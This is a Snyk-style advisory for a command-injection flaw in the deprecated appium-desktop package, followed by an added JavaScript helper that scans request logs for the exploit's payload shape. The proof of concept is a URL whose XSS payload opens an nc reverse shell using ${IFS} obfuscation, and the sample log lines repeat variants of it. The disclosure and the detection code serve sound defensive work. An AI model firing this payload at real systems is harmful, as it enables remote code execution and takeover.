Command Injection Affecting appium-desktop package, versions *
Threat Intelligence
- Exploit Maturity: Proof of concept
- EPSS: 96.19% (100th percentile)
- Snyk ID SNYK-JS-APPIUMDESKTOP-5491470
- published 3 May 2023
- disclosed 3 May 2023
- credit Aden Yap Chuen Zhen
How to fix?
There is no fixed version for appium-desktop.
Overview
appium-desktop is a graphical interface for the Appium server and an app inspector.
Affected versions of this package are vulnerable to Command Injection due to improper sanitization of user input, which allows an attacker to set up a reverse shell.
Note: This library is deprecated and users should switch to Appium and the Appium Inspector instead.
PoC
http://127.0.0.1/?xss=<img/src="1"/onerror=eval("require('child_process').exec('nc${IFS}localhost${IFS}4444${IFS}-e${IFS}/bin/bash');");>
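For detection, the following log-triage helper is an added example, not code from the Snyk advisory or from the appium-desktop project. It flags request-log entries carrying the payload shape shown in the PoC above (an inline event handler that reaches Node's child_process, with ${IFS} standing in for spaces), including percent-encoded variants. The log format and every entry below are constructed for the demonstration.

```javascript
// Constructed request log: "<client-ip> <method> <url> <status>"
const SAMPLE_LOG = [
  "192.0.2.10 GET /?xss=hello 200",
  "192.0.2.11 GET /?xss=<img/src=\"1\"/onerror=eval(\"require('child_process').exec('echo${IFS}probe')\")> 200",
  "192.0.2.12 GET /?xss=%3Cimg%2Fsrc%3D%221%22%2Fonerror%3Deval%28%22require%28%27child_process%27%29%22%29%3E 200",
  "192.0.2.13 GET /inspector?session=abc123 200",
];

// ${IFS} / $IFS: shell word separator used to avoid literal spaces in a URL.
const IFS_RE = /\$\{?ifs\}?/;

// Indicators checked on the decoded, lowercased URL after IFS is turned back into spaces.
const INDICATORS = [
  ["inline-event-handler", /<[a-z]+[^>]*[\s/]on[a-z]+\s*=/],
  ["node-child-process", /require\s*\(\s*['"`]child_process['"`]\s*\)/],
  ["eval-call", /\beval\s*\(/],
];

function decodeUrl(rawUrl) {
  try {
    return decodeURIComponent(rawUrl);
  } catch (err) {
    return rawUrl; // malformed percent-encoding: inspect as-is rather than drop the line
  }
}

// Returns null for benign or unparseable lines, otherwise the entry plus the indicators hit.
function triageLine(line) {
  const m = line.match(/^(\S+) (\S+) (\S+) (\d{3})$/);
  if (!m) return null;
  const [, ip, method, url] = m;
  const decoded = decodeUrl(url).toLowerCase();
  const hits = [];
  if (IFS_RE.test(decoded)) hits.push("ifs-obfuscation");
  const normalized = decoded.replace(/\$\{?ifs\}?/g, " ");
  for (const [name, re] of INDICATORS) {
    if (re.test(normalized)) hits.push(name);
  }
  return hits.length ? { ip, method, url, hits } : null;
}

function triageLog(lines) {
  return lines.map(triageLine).filter(Boolean);
}

for (const f of triageLog(SAMPLE_LOG)) {
  console.log(`${f.ip} ${f.method} ${f.hits.join(",")}`);
}
```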
References
CVSS Scores (version 3.1)